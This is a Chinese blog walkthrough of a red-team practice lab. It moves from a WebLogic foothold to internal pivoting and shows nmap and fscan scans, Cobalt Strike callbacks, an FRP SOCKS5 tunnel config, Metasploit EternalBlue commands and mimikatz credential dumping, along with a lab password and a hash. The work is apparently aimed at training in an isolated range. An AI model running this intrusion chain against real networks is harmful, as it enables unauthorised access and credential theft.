漏洞靶场实战-红队靶场从外网 Weblogic 打进内网,再到约束委派接管域控(上)

OceanSec
692 阅读4分钟

持续创作,加速成长!这是我参与「掘金日新计划 · 6 月更文挑战」的第18天,点击查看活动详情

从外网 Weblogic 打进内网,再到约束委派接管域控

靶场来自渗透攻击红队,官方 wp 及下载地址:mp.weixin.qq.com/s/dcYbIfLwN…

本靶场存在的漏洞:

GPP:admin:admin!@#45
存在 GPP 漏洞
存在 MS14-068
存在 CVE-2020-1472
Exchange 各种漏洞都可尝试
可尝试非约束委派
可尝试约束委派
存在 CVE-2019-1388
存在 CVE-2019-0708

环境搭建

虚拟机文件比较大,解压之后有 74.8G,所以要保证有足够的空间,建议使用固态硬盘,解压之后直接使用 VMware 扫描虚拟机并依次获取权限

image-20220507102253091

网站拓扑

图片

更新一下上图的环境

网关 IP:192.168.43.252
Kali IP:192.168.43.58
Windows 11 hacker IP:192.168.43.166
Windows 2012 IP:192.168.43.92

发现 Windows 可以 ping 通 Kali,但是 kali 却 ping 不通,很容易想到是 Windows 的防火墙问题,关掉即可

还需要注意一个问题,这里选择的是桥接模式,之前都是 nat,其实用哪一种都行

image-20220507144405849

这个图就很好地说明了之前的区别,就是使用 nat 模式的物理机是可以访问所有虚拟机的但是虚拟机无法访问物理机,使用桥接就可以相互访问,还有说如果是需要认证的校园网大概率用户不了桥接模式(虚拟机没法联网)

靶机一的 weblogic 需要手动开启

weblogic 安装目录:C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain(手动运行下 startWebLogic.cmd)

1.外网打点

目标 IP:192.168.43.92

使用 nmap 进行端口扫描服务发现

nmap -sV -sT -Pn 192.168.43.92

在一般实战中建议制定端口扫描,因为速度快且扫描精度高

nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88 192.168.43.92

image-20220507152533105

发现开放了 7001 端口,即 weblogic 服务

http://192.168.43.92:7001/console/login/LoginForm.jsp

image-20220507150339521

利用工具下载,过于脚本小子了

image-20220507152649200

执行命令发现是 administrator 权限,并且可以连通外网

image-20220507152734392

2.上线 CS

直接执行 Powershell 命令上线 CS

在 VPS 或者虚拟机 kali 上开启 CS server,生成监听器,执行命令

image-20220507160155736

上线

image-20220507160209182

通过命令发现存在第二个网卡,是一个内网网段

image-20220507160554444

3.内网横向

信息收集

  • 抓取主机密码

    image-20220507161002707

    WEBLOGIC\Administrator ccef208c6485269c20db2cad21734fe7

    靶机为 WinServer 2012 所以不能直接读明文密码

  • 判断是否在域内

    ipconfig /all

    image-20220507162339102

    判断在工作组中而不是在域中

    使用以下两条命令再确认一下

    systeminfo
net config workstation

    image-20220507162536101

    image-20220507162502035

存活探测&漏洞扫描

CS 导入 Cobalt-Strike-Aggressor-Scripts 插件组,插件下载地址:github.com/timwhitez/C…

image-20220507163012012

加载之后右击主机列表会出现很多工具

image-20220507163102893

向 Victim 机器上传 nbtscan,之后执行 nbtscan 输入目标 10.10.20.0/24

image-20220507163330797

发现一台机器 IP 为 10.10.20.7

通过文件管理上传 fscan 进行扫描

shell fscan_win32.exe -h 10.10.20.0/24

确定目标机器为 win7 系统,并且存在永恒之蓝

image-20220507163928351

搭建代理

  1. 搭建 Frp 隧道,进行漏洞利用,Kali 上配置 Frps.ini 配置文件

    image-20220507164347971

    启动 Frps

    ./frps -c frps.ini

    image-20220507164613634

  2. Victim 上传 frpc.exe 和 frpc.ini

    [common]
server_addr = VPS/kali ip
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

    启动 frpc

    shell frpc.exe -c frpc.ini

    image-20220507165114178

    启动之后代理就搭建完毕了,这样攻击者就可以通过跳板机 weblogic 靶机向内网发起访问请求

ms17010

因为内网 win7 主机存在 ms17010 直接用 msf

首先拿到 meterpreter 会话

msf6 > setg Proxies socks5:192.168.43.58:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run

proxy 的 IP 就是 kali 的 IP,rhost 就是内网地址

在 msf 攻击中可以清晰的看到攻击流程,使用的是目标 smb 445 端口

第一次以蓝屏终结

image-20220508105156665

MSF永恒之蓝mf17010失败原因

  1. 一次没有成功再多次尝试
  2. 目标机器蓝屏
  3. MSF payload 为 64 位目标机器也需要 64 位,也 python 有 32 位 的 payload
  4. 永恒之蓝流量比较大

修改了下 win7 靶机内存调整到了 2G,第二次尝试成功

image-20220508105707845

拿到 meterpreter

image-20220508105805150

抓密码

加载 mimikatz 读密码

load mimikatz
msv
kerberos

image-20220508105943889

image-20220508110552191

也可以加载新版 mimikatz - wiki

image-20220508110643832

可以发现没有明文密码,因为 win7 管理员没有登录,所以没有抓取到明文密码,只需要管理员登录机器再次执行命令就可以抓到明文密码

image-20220508111022485

avatar
文章
阅读
粉丝